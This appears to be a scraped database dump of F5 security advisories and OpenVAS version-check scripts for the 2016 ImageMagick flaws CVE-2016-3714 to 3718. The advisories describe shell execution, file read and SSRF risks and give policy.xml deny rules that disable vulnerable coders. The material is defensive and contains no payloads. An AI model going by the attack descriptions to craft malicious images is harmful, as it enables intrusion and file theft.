Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide\n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "edition": 1, "modified": "2016-09-02T00:00:00", "published": "2016-05-13T00:00:00", "id": "SOL25102203", "href": "http://support.f5.com/kb/en-us/solutions/public/k/25/sol25102203.html", "type": "f5", "title": "SOL25102203 - ImageMagick vulnerability CVE-2016-3716", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:30", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. 
To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol29154575\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **LABEL** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" />\n\nSince the vulnerable coder listed in CVE-2016-3717 is LABEL, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "edition": 1, "modified": "2016-09-02T00:00:00", "published": "2016-05-13T00:00:00", "id": "SOL29154575", "href": "http://support.f5.com/kb/en-us/solutions/public/k/29/sol29154575.html", 
"type": "f5", "title": "SOL29154575 - ImageMagick vulnerability CVE-2016-3717", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:24", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol10550253\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, since the vulnerable coders listed in CVE-2016-3715 is EPHEMERAL, the modified **policymap** stanza should look similar to the following example: \n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /> \n</policymap>\n\n 5. 
Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "edition": 1, "modified": "2016-09-02T00:00:00", "published": "2016-05-13T00:00:00", "id": "SOL10550253", "href": "http://support.f5.com/kb/en-us/solutions/public/k/10/sol10550253.html", "type": "f5", "title": "SOL10550253 - ImageMagick vulnerability CVE-2016-3715", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-08-16T21:24:15", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. 
To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol03151140\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **HTTPS** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\n\nSince the vulnerable coders listed in CVE-2016-3714 are EPHEMERAL, HTTPS, MVG, MSL, TEXT, SHOW, WIN, and PLT, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"TEXT\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"SHOW\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"WIN\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"PLT\" /> \n</policymap>\n\n 5. 
Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "edition": 1, "modified": "2016-08-16T00:00:00", "published": "2016-05-09T00:00:00", "id": "SOL03151140", "href": "http://support.f5.com/kb/en-us/solutions/public/k/03/sol03151140.html", "title": "SOL03151140 - ImageMagick vulnerability CVE-2016-3714", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:20", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. 
To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick** global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol61974123\n\n 3. Edit the **ImageMagick** global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick** coders in the **policymap** stanza. For example, if the **HTTP** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /> \n \nSince the vulnerable coders listed in CVE-2016-3718 are HTTP and FTP, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"FTP\" /> \n</policymap>\n\n 5. 
Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "edition": 1, "modified": "2016-09-02T00:00:00", "published": "2016-05-13T00:00:00", "id": "SOL61974123", "href": "http://support.f5.com/kb/en-us/solutions/public/k/61/sol61974123.html", "type": "f5", "title": "SOL61974123 - ImageMagick vulnerability CVE-2016-3718", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:35:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Check the version of ImageMagick", "modified": "2019-03-08T00:00:00", "published": "2016-05-10T00:00:00", "id": "OPENVAS:1361412562310882483", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882483", "type": "openvas", "title": "CentOS Update for ImageMagick CESA-2016:0726 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ImageMagick CESA-2016:0726 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882483\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:19:32 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ImageMagick CESA-2016:0726 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of ImageMagick\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"ImageMagick is an image display and\nmanipulation tool for the X Window System that can read and write multiple image\nformats.\n\nSecurity Fix(es):\n\n * It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. 
A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the ImageMagick\nutilities, would lead to arbitrary execution of shell commands with the\nprivileges of the user running the application. (CVE-2016-3714)\n\n * It was discovered that certain ImageMagick coders and pseudo-protocols\ndid not properly prevent security sensitive operations when processing\nspecially crafted images. A remote attacker could create a specially\ncrafted image that, when processed by an application using ImageMagick or\nan unsuspecting user using the ImageMagick utilities, would allow the\nattacker to delete, move, or disclose the contents of arbitrary files.\n(CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n * A server-side request forgery flaw was discovered in the way ImageMagick\nprocessed certain images. A remote attacker could exploit this flaw to\nmislead an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities into, for example, performing HTTP(S) requests or\nopening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that\ndisables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL\ncoders. If you experience any problems after the update, it may be\nnecessary to manually adjust the policy.xml file to match your\nrequirements. 
Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\");\n script_tag(name:\"affected\", value:\"ImageMagick on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0726\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-May/021865.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++-devel\", rpm:\"ImageMagick-c++-devel~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n 
{\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "The remote host is missing an update for the 'ImageMagick' package(s) announced via the referenced advisory.", "modified": "2020-01-31T00:00:00", "published": "2016-05-08T00:00:00", "id": "OPENVAS:1361412562310851307", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851307", "type": "openvas", "title": "SUSE: Security Advisory for ImageMagick (SUSE-SU-2016:1260-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851307\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:19:24 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for ImageMagick (SUSE-SU-2016:1260-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n 
pseudo protocol to get content of the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n\n - Use external svg loader (rsvg)\");\n\n script_tag(name:\"affected\", value:\"ImageMagick on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:1260-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3\", rpm:\"libMagick++-6_Q16-3~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-debuginfo\", rpm:\"libMagick++-6_Q16-3-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-32bit\", rpm:\"libMagickCore-6_Q16-1-32bit~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n 
}\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1\", rpm:\"libMagickCore-6_Q16-1~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo-32bit\", rpm:\"libMagickCore-6_Q16-1-debuginfo-32bit~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo\", rpm:\"libMagickCore-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1\", rpm:\"libMagickWand-6_Q16-1~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo\", rpm:\"libMagickWand-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1\", rpm:\"libMagickCore-6_Q16-1~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo\", rpm:\"libMagickCore-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1\", rpm:\"libMagickWand-6_Q16-1~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo\", rpm:\"libMagickWand-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n 
} else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Check the version of ImageMagick", "modified": "2019-03-08T00:00:00", "published": "2016-05-10T00:00:00", "id": "OPENVAS:1361412562310882484", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882484", "type": "openvas", "title": "CentOS Update for ImageMagick CESA-2016:0726 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ImageMagick CESA-2016:0726 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882484\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:19:37 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ImageMagick CESA-2016:0726 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of ImageMagick\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"ImageMagick is an image display and\nmanipulation tool for the X Window System that can read and write multiple\nimage formats.\n\nSecurity Fix(es):\n\n * It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the ImageMagick\nutilities, would lead to arbitrary execution of shell commands with the\nprivileges of the user running the application. 
(CVE-2016-3714)\n\n * It was discovered that certain ImageMagick coders and pseudo-protocols\ndid not properly prevent security sensitive operations when processing\nspecially crafted images. A remote attacker could create a specially\ncrafted image that, when processed by an application using ImageMagick or\nan unsuspecting user using the ImageMagick utilities, would allow the\nattacker to delete, move, or disclose the contents of arbitrary files.\n(CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n * A server-side request forgery flaw was discovered in the way ImageMagick\nprocessed certain images. A remote attacker could exploit this flaw to\nmislead an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities into, for example, performing HTTP(S) requests or\nopening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that\ndisables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL\ncoders. If you experience any problems after the update, it may be\nnecessary to manually adjust the policy.xml file to match your\nrequirements. 
